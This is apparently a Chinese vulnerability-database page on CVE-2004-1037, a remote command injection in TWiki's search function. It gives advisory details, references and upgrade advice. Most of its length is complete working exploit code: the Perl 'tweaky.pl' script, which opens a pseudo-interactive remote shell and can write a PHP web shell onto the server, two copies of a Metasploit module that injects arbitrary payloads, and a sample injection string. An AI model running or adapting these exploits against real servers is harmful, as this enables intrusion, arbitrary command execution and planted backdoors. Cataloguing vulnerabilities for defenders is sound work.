CVE-2004-1037
CVSS10.0
发布时间 :2005-03-01 00:00:00
修订时间 :2016-10-17 22:50:54
NMCOEPS    

[原文]The search function in TWiki 20030201 allows remote attackers to execute arbitrary commands via shell metacharacters in a search string.


[CNNVD]TWiki 搜索功能 任意SHELL命令执行漏洞(CNNVD-200503-031)

        TWiki是一个灵活、强大、安全并且简单的基于WEB的合作平台。
        TWiki的search功能没有正确过滤用户提交的搜索字符串,远程攻击者可以利用这个漏洞以进程权限执行任意SHELL命令。
        搜索功能中对搜索字符串的数据缺少过滤,提交包含SHELL元字符的数据,可以进程权限执行任意SHELL命令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:gentoo:linuxGentoo Linux
cpe:/a:twiki:twiki:2003-02-01

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1037
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1037
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-031
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2004-11/0201.html
(UNKNOWN)  FULLDISC  20041116 Re: [Full-Disclosure] TWiki search function allows arbitrary shell command execution
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000918
(UNKNOWN)  CONECTIVA  CLA-2005:918
http://marc.info/?l=bugtraq&m=110037207516456&w=2
(UNKNOWN)  BUGTRAQ  20041112 TWiki search function allows arbitrary shell command execution
http://security.gentoo.org/glsa/glsa-200411-33.xml
(UNKNOWN)  GENTOO  GLSA-200411-33
http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
(UNKNOWN)  CONFIRM  http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch
http://www.ciac.org/ciac/bulletins/p-039.shtml
(UNKNOWN)  CIAC  P-039
http://www.securityfocus.com/bid/11674
(VENDOR_ADVISORY)  BID  11674
http://xforce.iss.net/xforce/xfdb/18062
(VENDOR_ADVISORY)  XF  twik-search-command-execution(18062)

- 漏洞信息

TWiki 搜索功能 任意SHELL命令执行漏洞
危急 输入验证
2005-03-01 00:00:00 2005-10-20 00:00:00
远程  
        TWiki是一个灵活、强大、安全并且简单的基于WEB的合作平台。
        TWiki的search功能没有正确过滤用户提交的搜索字符串,远程攻击者可以利用这个漏洞以进程权限执行任意SHELL命令。
        搜索功能中对搜索字符串的数据缺少过滤,提交包含SHELL元字符的数据,可以进程权限执行任意SHELL命令。
        

- 公告与补丁

        暂无数据

- 漏洞信息 (642)

TWiki 20030201 search.pm Remote Command Execution Exploit (EDBID:642)
cgi webapps
2004-11-20 Verified
0 RoMaNSoFt
N/A [点击下载]
#!/usr/bin/perl

# "tweaky.pl" v. 1.0 beta 2
#
# Proof of concept for TWiki vulnerability. Remote code execution
# Vuln discovered, researched and exploited by RoMaNSoFt <roman rs-labs com>
#
# Madrid, 30.Sep.2004.


require LWP::UserAgent;
use Getopt::Long;

### Default config
$host = '';
$path = '/cgi-bin/twiki/search/Main/';
$secure = 0;
$get = 0;
$post = 0;
$phpshellpath='';
$createphpshell = '(echo `perl -e \'print chr(60).chr(63)\'` ; echo \'$out = shell_exec($_GET["cmd"].
" 2\'`perl -e \'print chr(62).chr(38)\'`\'1");\' ; echo \'echo "\'`perl -e \'print chr(60)."pre".chr(62)."\\\\
$out".chr(60)."/pre".chr(62)\'`\'";\' ; echo `perl -e \'print chr(63).chr(62)\'`) | tee ';
$logfile = ''; # If empty, logging will be disabled
$prompt = "tweaky\$ ";
$useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)';
$proxy = '';
$proxy_user = '';
$proxy_pass = '';
$basic_auth_user = '';
$basic_auth_pass = '';
$timeout = 30;
$debug = 0;
$init_command = 'uname -a ; id';
$start_mark = 'AAAA';
$end_mark = 'BBBB';
$pre_string = 'nonexistantttt\' ; (';
$post_string = ') | sed \'s/\(.*\)/'.$start_mark.'\1'.$end_mark.'.txt/\' ; fgrep -i -l -- \'nonexistantttt';
$delim_start = '<b>'.$start_mark;
$delim_end = $end_mark.'</b>';

print "Proof of concept for TWiki vulnerability. Remote code execution.\n";
print "(c) RoMaNSoFt, 2004. <roman\@rs-labs.com>\n\n";

### User-supplied config (read from the command-line)
$parsing_ok = GetOptions ('host=s' => \$host,
'path=s' => \$path,
'secure' => \$secure,
'get' => \$get,
'post' => \$post,
'phpshellpath=s' => \$phpshellpath,
'logfile=s' => \$logfile,
'init_command=s' => \$init_command,
'useragent=s' => \$useragent,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'basic_auth_user=s' => \$basic_auth_user,
'basic_auth_pass=s' => \$basic_auth_pass,
'timeout=i' => \$timeout,
'debug' => \$debug,
'start_mark=s' => \$start_mark,
'end_mark=s' => \$end_mark);

### Some basic checks
&banner unless ($parsing_ok);

if ($get and $post) {
print "Choose one only method! (GET or POST)\n\n";
&banner;
}

if (!($get or $post)) {
# If not specified we prefer POST method
$post = 1;
}

if (!$host) {
print "You must specify a target hostname! (tip: --host <hostname>)\n\n" ;
&banner;
}

$url = ($secure ? 'https' : 'http') . "://" . $host . $path;

### Checking for a vulnerable TWiki
&run_it ($init_command, 'RS-Labs rlz!');

### Execute selected payload

if ($phpshellpath) {
&create_phpshell;
print "PHPShell created.";
} else {
&pseudoshell;
}

### End
exit(0);


### Create PHPShell
sub create_phpshell {
$createphpshell .= $phpshellpath;
&run_it($createphpshell, 'yeah!');
}


### Pseudo-shell
sub pseudoshell {
open(LOGFILE, ">>$logfile") if $logfile;
open(STDINPUT, '-');

print "Welcome to RoMaNSoFt's pseudo-interactive shell :-)\n[Type Ctrl-D or (bye, quit, exit, logout) to exit]\n
\n".$prompt.$init_command."\n";
&run_it ($init_command);
print $prompt;

while (<STDINPUT>) {
chop;
if ($_ eq "bye" or $_ eq "quit" or $_ eq "exit" or $_ eq "logout") {
exit(1);
}

&run_it ($_) unless !$_;
print "\n".$prompt;
}

close(STDINPUT);
close(LOGFILE) if $logfile;
}


### Print banner and die
sub banner {
print "Syntax: ./tweaky.pl --host=<host> [options]\n\n";
print "Proxy options: --proxy=http://proxy:port --proxy_user=foo --proxy_pass=bar\n";
print "Basic auth options: --basic_auth_user=foo --basic_auth_pass=bar\n";
print "Secure HTTP (HTTPS): --secure\n";
print "Path to CGI: --path=$path\n";
print "Method: --get | --post\n";
print "Enable logging: --logfile=/path/to/a/file\n";
print "Create PHPShell: --phpshellpath=/path/to/phpshell\n";

exit(1);
}


### Execute command via vulnerable CGI
sub run_it {
my ($command, $testing_vuln) = @_;
my $req;
my $ua = new LWP::UserAgent;

$ua->agent($useragent);
$ua->timeout($timeout);

# Build CGI param and urlencode it
my $search = $pre_string . $command . $post_string;
$search =~ s/(\W)/"%" . unpack("H2", $1)/ge;

# Case GET
if ($get) {
$req = HTTP::Request->new('GET', $url . "?scope=text&order=modified&search=$search");
}

# Case POST
if ($post) {
$req = new HTTP::Request POST => $url;
$req->content_type('application/x-www-form-urlencoded');
$req->content("scope=text&order=modified&search=$search");
}

# Proxy definition
if ($proxy) {
if ($secure) {
# HTTPS request
$ENV{HTTPS_PROXY} = $proxy;
$ENV{HTTPS_PROXY_USERNAME} = $proxy_user;
$ENV{HTTPS_PROXY_PASSWORD} = $proxy_pass; 
} else {
# HTTP request
$ua->proxy(['http'] => $proxy);
$req->proxy_authorization_basic($proxy_user, $proxy_pass); 
}
}

# Basic Authorization
$req->authorization_basic($basic_auth_user, $basic_auth_pass) if ($basic_auth_user);

# Launch request and parse results
my $res = $ua->request($req);

if ($res->is_success) {

print LOGFILE "\n".$prompt.$command."\n" if ($logfile and !$testing_vuln);
@content = split("\n", $res->content);

my $empty_response = 1;

foreach $_ (@content) {
my ($match) = ($_ =~ /$delim_start(.*)$delim_end/g);

if ($debug) {
print $_ . "\n";
} else {
if ($match) {
$empty_response = 0;
print $match . "\n" unless ($testing_vuln);
}
}

print LOGFILE $match . "\n" if ($match and $logfile and !$testing_vuln);
}

if ($empty_response) {
if ($testing_vuln) {
die "Sorry, exploit didn't work!\nPerhaps TWiki is patched or you supplied a wrong URL 
(remember it should point to Twiki's search page).\n";
} else {
print "[Server issued an empty response. Perhaps you entered a wrong command?]\n";
}
}

} else {
die "Couldn't connect to server. Error message follows:\n" . $res->status_line . "\n";
} 
}

# milw0rm.com [2004-11-20]
		

- 漏洞信息 (16894)

TWiki Search Function Arbitrary Command Execution (EDBID:16894)
php webapps
2010-07-03 Verified
0 metasploit
N/A [点击下载]
##
# $Id: twiki_search.rb 9671 2010-07-03 06:21:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TWiki Search Function Arbitrary Command Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the search component of TWiki.
				By passing a 'search' parameter containing shell metacharacters to the
				'WebSearch' script, an attacker can execute arbitrary OS commands.
			},
			'Author'         =>
				[
					# Unknown - original discovery
					'jduck'       # metasploit version
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9671 $',
			'References'     =>
				[
					[ 'CVE', '2004-1037' ],
					[ 'OSVDB', '11714' ],
					[ 'BID', '11674' ],
					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
				],
			'Privileged'     => true, # web server context
			'Payload'        =>
				{
					'DisableNops' => true,
					'BadChars'    => ' ',
					'Space'       => 1024,
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Oct 01 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
			], self.class)
	end


	def check
		content = rand_text_alphanumeric(16+rand(16))
		test_file = rand_text_alphanumeric(8+rand(8))
		cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
		test_url = datastore['URI'] + '/view/Main/' + test_file

		# first see if it already exists (it really shouldn't)
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.body.match(content))
			print_error("WARNING: The test file exists already!")
			return Exploit::CheckCode::Safe
		end

		# try to create it
		print_status("Attempting to create #{test_url} ...")
		search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(search)
			}, 25)
		if (not res) or (res.code != 200)
			return Exploit::CheckCode::Safe
		end

		# try to run it, 500 code == successfully made it
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (not res.body.match(content))
			return Exploit::CheckCode::Safe
		end

		# delete the tmp file
		print_status("Attempting to delete #{test_url} ...")
		search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(search)
			}, 25)
		if (not res) or (res.code != 200)
			print_error("WARNING: unable to remove test file (#{test_file})")
		end

		return Exploit::CheckCode::Vulnerable
	end


	def exploit

		search = rand_text_alphanumeric(1+rand(8))
		search << "';" + payload.encoded + ";#\'"

		query_str = datastore['URI'] + '/view/Main/WebSearch'
		query_str << '?search='
		query_str << Rex::Text.uri_encode(search)

		res = send_request_cgi({
				'method'    => 'GET',
				'uri'	      => query_str,
			}, 25)

		if (res and res.code == 200)
			print_status("Successfully sent exploit request")
		else
			raise RuntimeError, "Error sending exploit request"
		end

		handler
	end

end
		

- 漏洞信息 (F86541)

TWiki Search Function Arbitrary Command Execution (PacketStormID:F86541)
2010-02-23 00:00:00
 
exploit,arbitrary,shell
CVE-2004-1037
[点击下载]

This Metasploit module exploits a vulnerability in the search component of TWiki. By passing a 'search' parameter containing shell metacharacters to the 'WebSearch' script, an attacker can execute arbitrary OS commands.

##
# $Id: twiki_search.rb 8578 2010-02-21 20:31:09Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'TWiki Search Function Arbitrary Command Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the search component of TWiki.
				By passing a 'search' parameter containing shell metacharacters to the 
				'WebSearch' script, an attacker can execute arbitrary OS commands.
			},
			'Author'         =>
				[
					# Unknown - original discovery
					'jduck'       # metasploit version
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8578 $',
			'References'     =>
				[
					[ 'CVE', '2004-1037' ],
					[ 'OSVDB', '11714' ],
					[ 'BID', '11674' ],
					[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
				],
			'Privileged'     => true, # web server context
			'Payload'        =>
				{
					'DisableNops' => true,
					'BadChars'    => ' ',
					'Space'       => 1024,
				},
			'Platform'       => [ 'unix' ],
			'Arch'           => ARCH_CMD,
			'Targets'        => [[ 'Automatic', { }]],
			'DisclosureDate' => 'Oct 01 2004',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
				], self.class)
	end


	def check
		content = rand_text_alphanumeric(16+rand(16))
		test_file = rand_text_alphanumeric(8+rand(8))
		cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
		test_url = datastore['URI'] + '/view/Main/' + test_file

		# first see if it already exists (it really shouldn't)
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (res.body.match(content))
			print_error("WARNING: The test file exists already!")
			return Exploit::CheckCode::Safe
		end

		# try to create it
		print_status("Attempting to create #{test_url} ...")
		search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(search)
			}, 25)
		if (not res) or (res.code != 200)
			return Exploit::CheckCode::Safe
		end

		# try to run it, 500 code == successfully made it
		res = send_request_raw({
				'uri' => test_url
			}, 25)
		if (not res) or (not res.body.match(content))
			return Exploit::CheckCode::Safe
		end
		
		# delete the tmp file
		print_status("Attempting to delete #{test_url} ...")
		search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
		res = send_request_raw({
				'uri' => cmd_base + Rex::Text.uri_encode(search)
			}, 25)
		if (not res) or (res.code != 200)
			print_error("WARNING: unable to remove test file (#{test_file})")
		end

		return Exploit::CheckCode::Vulnerable
	end


	def exploit

		search = rand_text_alphanumeric(1+rand(8))
		search << "';" + payload.encoded + ";#\'"

		query_str = datastore['URI'] + '/view/Main/WebSearch'
		query_str << '?search='
		query_str << Rex::Text.uri_encode(search)

		res = send_request_cgi({
			'method'    => 'GET',
			'uri'	      => query_str,
		}, 25)

		if (res and res.code == 200)
			print_status("Successfully sent exploit request")
		else
			raise RuntimeError, "Error sending exploit request"
		end

		handler
	end

end
    

- 漏洞信息 (F35068)

tweaky.pl (PacketStormID:F35068)
2004-11-20 00:00:00
Roman Medina-Heigl Hernandez aka RoMaNSoFt  rs-labs.com
exploit,remote,perl,code execution
CVE-2004-1037
[点击下载]

TWiki Release 01-Feb-2003 and below remote code execution exploit in perl.

- 漏洞信息

11714
TWiki Search Function Arbitrary Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified, Uncoordinated Disclosure, Discovered in the Wild

- 漏洞描述

Twiki contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is triggered when specially crafted shell metacharacters are passed to the Search parameter, which does not validate input.

- 时间线

2004-11-13 2004-11-12
2004-10-01 2004-11-13

- 解决方案

Upgrade to version 02Sep2004 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

TWiki Search Shell Metacharacter Remote Arbitrary Command Execution Vulnerability
Input Validation Error 11674
Yes No
2004-11-12 12:00:00 2009-07-12 08:06:00
Discovery is credited to Markus Goetz, Joerg Hoh, Michael Holzt, Florian Laws, Hans Ulrich Niedermann, Andreas Thienemann, Peter Thoeny, and Florian Weimer.

- 受影响的程序版本

TWiki TWiki 20040901
TWiki TWiki 20030201
TWiki TWiki 01-Feb-2003
TWiki TWiki 01-Dec-2001
TWiki TWiki 01-Dec-2000
Gentoo Linux
Conectiva Linux 10.0
TWiki TWiki 20040902

- 不受影响的程序版本

TWiki TWiki 20040902

- 漏洞讨论

TWiki is reported prone to a shell metacharacter remote command execution vulnerability. This issue may allow an attacker gain unauthorized access to a vulnerable computer by executing arbitrary commands.

TWiki 20030201 is reported vulnerable to this issue, however, it is likely that other versions are affected as well.

- 漏洞利用

An exploit is not required.

The following examples are available:
doesnotexist1'; (uname -a; id) | sed 's/\(.*\)/__BEGIN__\1__END__.txt/'; fgrep -i -l -- 'doesnotexist2

runvirus has supplied the exploit code Twiki-20030201-exec.pl.

- 解决方案

Gentoo has released a security advisory (GLSA 200411-33) and an updated eBuild to address this vulnerability. Gentoo users are advised to execute the following sequence of commands as a superuser in order to apply the updates:
emerge --sync
emerge --ask --oneshot --verbose ">=www-apps/twiki-20040902"

Conectiva Linux has mad advisory CLA-2005:918 available dealing with this issue. Please see the referenced advisory for more information.

The vendor has made an update available dealing with this issue.


Conectiva Linux 10.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站